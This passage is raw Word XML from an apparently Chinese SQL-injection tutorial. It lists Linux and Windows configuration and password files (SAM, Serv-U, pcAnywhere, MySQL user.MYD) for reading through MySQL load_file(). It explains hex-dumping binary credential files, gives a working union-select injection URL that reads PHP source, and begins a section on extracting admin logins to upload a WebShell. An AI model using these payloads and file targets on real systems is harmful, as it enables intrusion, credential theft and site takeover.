            <w:r w:rsidR="006D0CD4" w:rsidRPr="006D0CD4">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>相关设置</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E7A7282"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lastRenderedPageBreak/>
              <w:t xml:space="preserve">/etc/sysconfig/iptables       </w:t>
            </w:r>
            <w:r w:rsidR="00F63D4E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">                     </w:t>
            </w:r>
            <w:r w:rsidRPr="005862E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>//</w:t>
            </w:r>
            <w:r w:rsidR="006D0CD4" w:rsidRPr="006D0CD4">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防火</w:t>
            </w:r>
            <w:r w:rsidR="006D0CD4">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>墙</w:t>
            </w:r>
            <w:r w:rsidR="006D0CD4" w:rsidRPr="006D0CD4">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>规则策略</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A87AC08"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 xml:space="preserve">/etc/rsyncd.conf              </w:t>
            </w:r>
            <w:r w:rsidR="00F63D4E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">                  </w:t>
            </w:r>
            <w:r w:rsidRPr="005862E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>//</w:t>
            </w:r>
            <w:r w:rsidR="006D0CD4" w:rsidRPr="006D0CD4">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>同步程序配置</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41DFA1B2"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etc/sysconfig/network-script/</w:t>
            </w:r>
            <w:r w:rsidR="00F63D4E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">ifcfg-eth0           </w:t>
            </w:r>
            <w:r w:rsidRPr="005862E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>//查看IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B4B0DFE"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etc/my.cnf                   //Mysql的配置文件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4964AB6E"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 xml:space="preserve">/etc/redhat-release          </w:t>
            </w:r>
            <w:r w:rsidR="00F63D4E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r w:rsidRPr="005862E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> //系統版本</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="361172DA"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 xml:space="preserve">/etc/issue                    </w:t>
            </w:r>
            <w:r w:rsidR="00F63D4E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">              </w:t>
            </w:r>
            <w:r w:rsidRPr="005862E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>//系統版本</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="566FF182"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 xml:space="preserve">/etc/issue.net               </w:t>
            </w:r>
            <w:r w:rsidR="00F63D4E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">           </w:t>
            </w:r>
            <w:r w:rsidRPr="005862E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> //系統版本 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F90D9AD"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usr/local/resin/c</w:t>
            </w:r>
            <w:r w:rsidR="00F63D4E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">onf/resin.conf      </w:t>
            </w:r>
            <w:r w:rsidRPr="005862E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>//</w:t>
            </w:r>
            <w:r w:rsidR="006D0CD4" w:rsidRPr="006D0CD4">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查看Linux系统配置的JSP虚拟主机</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12FB8656" w14:textId="77777777" w:rsidR="005862E0" w:rsidRPr="005862E0" w:rsidRDefault="005862E0" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005862E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>/usr/local/resin-pro-3.0.22/conf/resin.conf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="565D4577"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usr/local/resin-3.0.22/conf/r</w:t>
            </w:r>
            <w:r w:rsidR="00F63D4E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>esin.conf     /</w:t>
            </w:r>
            <w:r w:rsidRPr="005862E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="006D0CD4" w:rsidRPr="006D0CD4">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查看RESIN 3.0.22配置文件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="533ED739"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c:\mysql\data</w:t>
            </w:r>
            <w:r w:rsidR="00F63D4E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">\mysql\user.MYD      </w:t>
            </w:r>
            <w:r w:rsidRPr="005862E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>//</w:t>
            </w:r>
            <w:r w:rsidR="006D0CD4" w:rsidRPr="006D0CD4">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>存储了“mysql.user”表中的数据库链接密码</w:t>
            </w:r>
            <w:r w:rsidRPr="005862E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>c:\program files\rhinosoft.com\serv-u\servudaemon.ini</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CD37C40" w14:textId="77777777" w:rsidR="006D0CD4" w:rsidRDefault="005862E0" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005862E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>c:\program fi</w:t>
            </w:r>
            <w:r w:rsidR="0014341A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">les\serv-u\servudaemon.ini  </w:t>
            </w:r>
            <w:r w:rsidRPr="005862E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>//</w:t>
            </w:r>
            <w:r w:rsidR="006D0CD4" w:rsidRPr="006D0CD4">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>FTP软件配置文件，存储虚拟主机网站路径和密码</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48527539" w14:textId="77777777" w:rsidR="005862E0" w:rsidRPr="005862E0" w:rsidRDefault="005862E0" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005862E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">c:\program files\mysql\my.ini                        </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E67DA9C"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 xml:space="preserve">c:\windows\my.ini               //Mysql配置文件 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="113A506A" w14:textId="77777777" w:rsidR="005862E0" w:rsidRPr="005862E0" w:rsidRDefault="005862E0" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005862E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>c:\windows\system32\inetsrv\metabase.xml        //IIS配置文件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="052BBFC3" w14:textId="77777777" w:rsidR="005862E0" w:rsidRPr="005862E0" w:rsidRDefault="005862E0" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005862E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>c:\resin\conf\resin.conf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A6859BA" w14:textId="77777777" w:rsidR="005862E0" w:rsidRDefault="005862E0" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005862E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>c:\resin-3.0.14\conf\resin.conf          //</w:t>
            </w:r>
            <w:r w:rsidR="006D0CD4" w:rsidRPr="006D0CD4">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查看JSP网站“resin”文件配置信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="16F41F5A" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00276D91" w:rsidRDefault="006E5ADB" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>（2）</w:t>
      </w:r>
      <w:r w:rsidR="00DC2333" w:rsidRPr="00276D91">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>load_file()读取二进制文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E637C3D" w14:textId="77777777" w:rsidR="00EE7EB3" w:rsidRPr="00200887" w:rsidRDefault="006F2F2E"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除了读取文本类型的文件外，load_file()还可以用来读取系统中的二进制文件，例如各种密</w:t>
      </w:r>
      <w:r w:rsidR="006601F6" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>码存储配置文件。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EE7EB3" w14:paraId="043F846C" w14:textId="77777777" w:rsidTr="00EE7EB3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39A20102" w14:textId="77777777" w:rsidR="00962D14" w:rsidRDefault="00EE7EB3" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE7EB3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>c:\windows\repair\sam               //windows</w:t>
            </w:r>
            <w:r w:rsidR="00962D14" w:rsidRPr="00962D14">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统初次安装时的密码</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="170D8332" w14:textId="77777777" w:rsidR="00EE7EB3" w:rsidRPr="00EE7EB3" w:rsidRDefault="00EE7EB3" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE7EB3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>c:\program files\s</w:t>
            </w:r>
            <w:r w:rsidR="00F63D4E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">erv-u\servuadmin.exe     </w:t>
            </w:r>
            <w:r w:rsidRPr="00EE7EB3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>//serv-U 6.0</w:t>
            </w:r>
            <w:r w:rsidR="00962D14" w:rsidRPr="00962D14">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>及之前版本的管理员密</w:t>
            </w:r>
            <w:r w:rsidR="00962D14" w:rsidRPr="00962D14">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>码文件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C6EC3FE" w14:textId="77777777" w:rsidR="00EE7EB3" w:rsidRPr="00EE7EB3" w:rsidRDefault="00EE7EB3" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE7EB3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>c:\program files\rhinosoft.com\servudaemo.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4061D545" w14:textId="77777777" w:rsidR="00EE7EB3" w:rsidRDefault="00EE7EB3" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE7EB3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>c:\documents and setting\all users\application data\symantec\pcanywhere\*.cif //</w:t>
            </w:r>
            <w:r w:rsidR="00962D14" w:rsidRPr="00962D14">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>pcanywhere登陆密码文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13C7DA3C" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00CD76A0" w:rsidRDefault="00F63D4E" w:rsidP="00200887">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="199"/>
        <w:textAlignment w:val="baseline"/>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w:t>
      </w:r>
      <w:r w:rsidR="006F2C48" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>只要MySQL注入点处的账号权限足够，那么loadee_file()函数就可以读取任何文件。但是需要注意的是，由于浏览器编码不能完全显示二进制编码文件，因此需要使用hex()函数将load_file()函数读出的二进制文件转为十六进制显示在网页上。再将网页中显示的十六进制代码复制到本地后，通过转换成二进制文件，才能加以利用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750BEFB5" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00276D91" w:rsidRDefault="006E5ADB" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（3）</w:t>
      </w:r>
      <w:r w:rsidR="00837FC6" w:rsidRPr="00276D91">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>load_file()函数读取文件时不可忽略的问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F7F0A2" w14:textId="77777777" w:rsidR="00D95F2E" w:rsidRPr="00CD76A0" w:rsidRDefault="00D95F2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上一个案例中，读取网页源代码时在网页中未能正常显示一些代码内容，这是由于网页源代码中包含一些特殊的字符，如“&lt;”、“&gt;”之类的，因此导致在返回源代码内容时显示为了网页效果，而不是真实的代码内容。因此，除了通过查看源代码外，还可以考虑在返回代码时替换一些特殊字符，从而令网页中正常显示源文件代码内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D756AF" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00CD76A0" w:rsidRDefault="00D95F2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可在</w:t>
      </w:r>
      <w:r w:rsidR="00A6717C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>load</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_file()函数使用时调用如下形式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27255DA1" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00CD76A0" w:rsidRDefault="0052034B" w:rsidP="00200887">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="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replace(load_file(char(文件路径十六进制代码))，char(60),char(32))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F85AC3F" w14:textId="77777777" w:rsidR="005C25CB" w:rsidRPr="00CD76A0" w:rsidRDefault="005C25C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句代码的意思是，将返回文件内容中的“&lt;”替换成空格，这样就可以屏蔽网页效果，从而查看到真实的网页内容了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262DE706" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00CD76A0" w:rsidRDefault="005C25C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例如，在上一个案例中，采用替换字符的方式读取文件，提交如下链接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A048781" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00CD76A0" w:rsidRDefault="00DE46F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20union%20select replace(load_file(0x633A5C5C7068705C5C6874646F63735C5C647677615C5C696E6465782E706870),char(60),char(32)),2+--+&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACF2DCA" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00CD76A0" w:rsidRDefault="007E1D0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页面中返回的就是源代码内容，而不再显示网页形式了(</w:t>
      </w:r>
      <w:r w:rsidR="00651463" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r w:rsidR="006E6BBE" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对比</w:t>
      </w:r>
      <w:r w:rsidR="00200887">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691C74A0" w14:textId="77777777" w:rsidR="004E24A3" w:rsidRDefault="006E6BBE" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61784C56" wp14:editId="5F1576C0">
            <wp:extent cx="5274310" cy="34634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5274310" cy="3463418"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B2FA97" w14:textId="77777777" w:rsidR="004E24A3" w:rsidRPr="00276D91" w:rsidRDefault="004E24A3" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04442BE1" w14:textId="77777777" w:rsidR="005A6B00" w:rsidRPr="005A6B00" w:rsidRDefault="00C76F7C" w:rsidP="005A6B00">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005700B1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>LIMIT查询在MySQL 5注入中的利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465412FB" w14:textId="77777777" w:rsidR="0006640B" w:rsidRPr="00CD76A0" w:rsidRDefault="003A7D41" w:rsidP="0006640B">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当MySQL版本在5.0以上，而且链接数据库账号是普通用户时，如果无权限读取网页源文件或重要的配置文件，那么可以通过猜解列出管理员信息，然后登录后台再上传WebShell。</w:t>
      </w:r>
      <w:r w:rsidR="0006640B" w:rsidRPr="0006640B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4.0以上支持union</w:t>
      </w:r>
      <w:r w:rsidR="0006640B" w:rsidRPr="0006640B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>4.1以上支持子查询</w:t>
      </w:r>
      <w:r w:rsidR="0006640B" w:rsidRPr="0006640B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
